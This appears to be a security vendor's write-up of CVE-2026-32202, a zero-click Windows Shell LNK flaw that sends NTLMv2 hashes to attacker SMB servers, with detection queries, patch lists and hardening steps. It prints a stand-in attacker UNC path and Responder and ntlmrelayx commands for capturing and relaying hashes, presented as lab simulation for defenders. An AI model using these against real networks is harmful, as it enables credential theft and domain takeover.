Vulnerability Analysis

CVE-2026-32202: Zero-Click Windows Shell Flaw Leaking NTLM Credentials in the Wild

Executive Summary

CVE-2026-32202 is an actively exploited Windows Shell spoofing vulnerability that enables a zero-click credential theft attack: any Windows user who opens a folder containing a crafted LNK (shortcut) file will silently transmit their NTLMv2 password hash to an attacker-controlled server — no clicks, no prompts, no warnings. The flaw originates from an incomplete patch for a prior APT28-exploited zero-day (CVE-2026-21510), leaving a residual authentication coercion vector that Russian state-sponsored threat actors are actively weaponizing. Microsoft patched the issue on April 14, 2026 (Patch Tuesday) and CISA ordered federal agencies to apply the fix by May 12, 2026.

1. What Is This Vulnerability?

CVE-2026-32202 is a Windows Shell spoofing vulnerability rooted in how the Windows namespace parser resolves UNC (Universal Naming Convention) paths embedded in .LNK shortcut files. Windows Explorer automatically resolves folder contents and fetches file icons as a user browses a directory. A crafted LNK file can embed a UNC path pointing to an attacker-controlled SMB server:

\\attacker.com\share\payload.cpl

When Windows Shell encounters this path, it does not validate the network zone (Internet vs. trusted zone) before resolving it. The shell initiates a TCP connection to port 445 on the attacker's server and triggers an automatic NTLM authentication handshake — silently transmitting the victim's Net-NTLMv2 hash.

Root Cause: An Incomplete Patch

The story begins with CVE-2026-21510 and CVE-2026-21513 — two vulnerabilities exploited by APT28 (Fancy Bear, a Russian GRU-linked threat group) via weaponized LNK files distributed in spear-phishing campaigns. Microsoft's February 2026 patch addressed the remote code execution aspect of that original chain, but researchers at Akamai Security discovered the fix was incomplete: the February patch blocked direct RCE delivery but left untouched the authentication coercion mechanism that allows the shell to initiate outbound SMB connections to arbitrary UNC paths. This residual flaw became CVE-2026-32202.

Attack Vector

[Victim browses folder]
        ↓
[Explorer renders folder icons]
        ↓
[Malicious LNK file found → Shell resolves embedded UNC path]
        ↓
[TCP 445 connection opened to attacker server — no user prompt]
        ↓
[Windows initiates NTLM handshake automatically]
        ↓
[Net-NTLMv2 hash transmitted to attacker server]
        ↓
[Attacker captures hash → offline cracking OR relay attack]

The attack requires zero clicks. Merely navigating to a folder in Windows Explorer, or previewing the folder through an email client's attachment pane, is sufficient to trigger hash exfiltration.

Real-World Impact

APT28 has been observed deploying this technique in targeted campaigns against European government networks, defense contractors, and diplomatic entities since at least late March 2026. Microsoft updated the CVE-2026-32202 advisory on April 27, 2026 to confirm active exploitation after initially publishing the patch without an exploitation flag on April 14. CISA added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog on April 29, 2026.

In environments without SMB signing enforced, captured Net-NTLMv2 hashes can be used in NTLM relay attacks to authenticate directly against domain controllers, file servers, and internal web applications — potentially enabling full domain compromise without ever cracking a password.

2. Who Is Affected?

The vulnerability affects virtually every supported version of Windows that has not yet received the April 2026 cumulative update:

Platform Affected Versions
Windows 10 1607 (LTSC), 1809, 21H2, 22H2
Windows 11 23H2, 24H2, 25H2, 26H1
Windows Server 2012, 2012 R2, 2016, 2019, 2022, 2025

High-risk configurations:

  • Any Windows host where SMB signing is not enforced (default in most domain environments for clients)
  • Environments where NTLM authentication is still permitted (common in legacy hybrid environments)
  • Systems with direct internet access where outbound TCP 445 is not blocked at the perimeter
  • Shared drives, network shares, or web-accessed file repositories where an attacker can plant a crafted LNK

3. How to Detect It (Testing)

Manual Testing Steps

  1. Check if your system is patched: Open PowerShell as Administrator and run:

    Get-HotFix | Where-Object { $_.HotFixID -in @('KB5083769','KB5082198','KB5082123','KB5082200','KB5082052','KB5082127','KB5082126','KB5082142','KB5082060','KB5082063') }

    If the relevant KB for your Windows version is absent, you are unpatched.

  2. Check patch level via WMI:

    (Get-ComputerInfo).OsHotFixes | Sort-Object InstalledOn -Descending | Select-Object -First 10

    Compare against the April 2026 cumulative update KB for your specific OS version.

  3. Verify SMB signing is enforced:

    Get-SmbServerConfiguration | Select-Object RequireSecuritySignature, EnableSecuritySignature
Get-SmbClientConfiguration | Select-Object RequireSecuritySignature

    RequireSecuritySignature should be True on both server and client.

  4. Check for outbound SMB firewall rules:

    Get-NetFirewallRule | Where-Object { $_.RemotePort -eq 445 -and $_.Direction -eq 'Outbound' -and $_.Action -eq 'Block' }

    If this returns nothing, outbound SMB to arbitrary hosts is permitted.

Automated Scanning

Qualys / Tenable / Rapid7:

  • Qualys QID: 91960 (or search for CVE-2026-32202 in the vulnerability catalog)
  • Tenable Plugin: Check Tenable.io or Nessus for CVE-2026-32202 detections under Windows patch assessment
  • Rapid7 InsightVM: Scan for CVE-2026-32202 via authenticated Windows scan

Responder / ntlmrelayx (attacker simulation in authorized environments):

# Drop a crafted LNK into a test share, then listen:
sudo responder -I eth0 -w -r -f
# Or use impacket's ntlmrelayx to verify hash capture
sudo python3 ntlmrelayx.py -tf targets.txt --smb2support

Expected output (if vulnerable): NTLMv2 hash capture entries in Responder logs when any user browses the test folder.

Microsoft Defender for Endpoint (MDE) KQL:

DeviceNetworkEvents
| where RemotePort == 445
| where InitiatingProcessFileName == "explorer.exe"
| where RemoteIPType == "Public" or RemoteUrl !contains ".internal"
| project DeviceName, LocalIP, RemoteIP, RemoteUrl, Timestamp

Unexpected outbound SMB from explorer.exe to external or non-server IPs is a strong indicator of coercion.

Code Review Checklist

  • Audit any application that renders or previews LNK/shortcut files
  • Verify no web applications serve .lnk files from user-uploaded content without sanitization
  • Confirm network shares do not allow unauthenticated write access (an attacker needs write access to plant the LNK)
  • Review email gateway rules for .lnk attachments and ZIP archives containing LNK files

4. How to Fix It (Mitigation)

Step-by-Step Remediation

  1. Apply the April 2026 Patch Tuesday cumulative update — this is the official fix. The specific KB varies by Windows version:

    Windows Version KB Article
    Windows 11 24H2 / 25H2 KB5083769
    Windows 11 23H2 KB5082198
    Windows 10 22H2 KB5082123
    Windows 10 21H2 KB5082200
    Windows 10 1809 KB5082052
    Windows Server 2025 KB5083769
    Windows Server 2022 KB5082127
    Windows Server 2019 KB5082060
    Windows Server 2016 KB5082126
    Windows Server 2012 R2 KB5082142
    Windows Server 2012 KB5082063

  2. Deploy via Windows Update or WSUS/MECM — confirm all endpoints in your estate have received the April 2026 update. Use your patch management console to generate a compliance report.

  3. Enable SMB signing as a defense-in-depth layer (see Configuration Hardening below).

  4. Block outbound SMB at the perimeter firewall — prevent TCP 445 to external IPs at your network edge.

  5. Prioritize internet-exposed systems and systems accessed by privileged users (domain admins, service accounts) for immediate patching.

Configuration Hardening

Enable SMB Signing via Group Policy (Recommended for all environments):

Navigate to: Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options

Set both:

  • Microsoft network client: Digitally sign communications (always)Enabled
  • Microsoft network server: Digitally sign communications (always)Enabled

Or configure via PowerShell:

Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
Set-SmbClientConfiguration -RequireSecuritySignature $true -Force

Block outbound SMB at the firewall:

# Block outbound TCP 445 (SMB) to non-internal ranges
New-NetFirewallRule -DisplayName "Block Outbound SMB" `
  -Direction Outbound -Protocol TCP -RemotePort 445 `
  -RemoteAddress Internet -Action Block

Restrict NTLM usage via Group Policy:

Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options

  • Network security: Restrict NTLM: Outgoing NTLM traffic to remote serversDeny all (Note: Test this carefully in your environment — legacy applications may require NTLM)

Block LNK files at email gateways and web proxies — configure your email security gateway to strip or quarantine .lnk file attachments, including within ZIP archives.

5. How to Test the Fix (Validation)

Regression Test Scenarios

  • Scenario A: After patching, drop a test LNK file containing a UNC path to an internal test server into a share. Browse to the folder — confirm no SMB authentication attempt is logged on the test server.
  • Scenario B: Using Responder in a lab environment (with authorization), confirm that browsing a folder containing the crafted LNK no longer results in hash capture after the patch is applied.
  • Scenario C: Verify no legitimate mapped drive or shortcut functionality is broken by the patch across standard user workflows.

Security Test Cases

Test Case 1: Verify SMB authentication coercion is blocked post-patch

  • Precondition: Apply KB for your Windows version; ensure Responder or equivalent listening tool is active on an internal test server
  • Steps: Create a .lnk file with TargetPath = \\test-server\capture\icon.ico; place in a shared folder; browse to the folder from the patched Windows endpoint
  • Expected Result: No NTLMv2 hash appears in Responder logs; Windows does not initiate SMB connection to the test server for icon resolution

Test Case 2: SMB signing prevents relay

  • Precondition: SMB signing enforced via GPO or PowerShell
  • Steps: Capture a hash (or simulate via responder) and attempt relay via ntlmrelayx
  • Expected Result: Relay fails with negotiation error due to signing requirement

Automated Tests

# Validate patch status across a fleet via PowerShell Remoting
$TargetKBs = @('KB5083769','KB5082198','KB5082123','KB5082200','KB5082052',
               'KB5082127','KB5082126','KB5082142','KB5082060','KB5082063')

$results = Invoke-Command -ComputerName (Get-ADComputer -Filter *).Name -ScriptBlock {
    param($kbs)
    $installed = (Get-HotFix).HotFixID
    $found = $kbs | Where-Object { $_ -in $installed }
    [PSCustomObject]@{
        ComputerName = $env:COMPUTERNAME
        PatchApplied = ($found.Count -gt 0)
        PatchID      = ($found -join ', ')
    }
} -ArgumentList (,$TargetKBs)

$results | Where-Object { -not $_.PatchApplied } | Export-Csv "unpatched-cve-2026-32202.csv" -NoTypeInformation
Write-Host "Unpatched systems exported to unpatched-cve-2026-32202.csv"

6. Prevention & Hardening

Best Practices

  • Enforce SMB signing universally — this single control eliminates the relay attack risk even if hashes are captured. It should be standard policy in any Active Directory environment. Windows 11 24H2+ now requires SMB signing by default, but older systems and servers need explicit configuration.
  • Disable NTLM where feasible, shift to Kerberos — modern Windows environments should minimize NTLM usage. Use the NTLM audit GPO (Network security: Restrict NTLM: Audit NTLM authentication in this domain) to identify and eliminate NTLM dependencies before blocking.
  • Maintain a rigorous patch cadence — CVE-2026-32202 illustrates the risk of delaying Patch Tuesday updates. An unpatched April 2026 system is exposed to an actively exploited APT28 campaign. Aim for a 7-14 day patch deployment SLA for critical and actively exploited vulnerabilities.
  • Block LNK files at the boundary — configure mail gateways (Microsoft Defender for Office 365, Proofpoint, Mimecast) to quarantine messages containing .lnk files or ZIP archives with .lnk contents. This is a common APT28 delivery vector.
  • Restrict write access to shared network drives — an attacker must be able to plant a malicious LNK in a location the victim will browse. Enforce least-privilege on file shares; prohibit unauthenticated or world-writable shares.

Monitoring & Detection

Sentinel / Splunk KQL — detect suspicious outbound SMB:

// Microsoft Sentinel
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemotePort == 445
| where InitiatingProcessFileName =~ "explorer.exe"
| where not(ipv4_is_private(RemoteIP))
| summarize Count=count() by DeviceName, RemoteIP, RemoteUrl
| order by Count desc

Windows Event Log indicators:

  • Event ID 4776 (NTLM authentication attempt) — watch for failed NTLM authentications to unknown remote hosts
  • Event ID 5157 (Windows Filtering Platform connection blocked) — useful if outbound SMB block rule is in place
  • Sysmon Event ID 3 (Network connection) — filter for explorer.exe initiating connections on port 445 to non-internal IPs

Alert on unexpected SMB relay indicators:

  • Multiple failed SMB authentication attempts from a single workstation to domain controllers within a short window (possible relay in progress)
  • NTLM authentications originating from IP addresses not associated with the source user account's known devices

References

Latest from the blog

See all →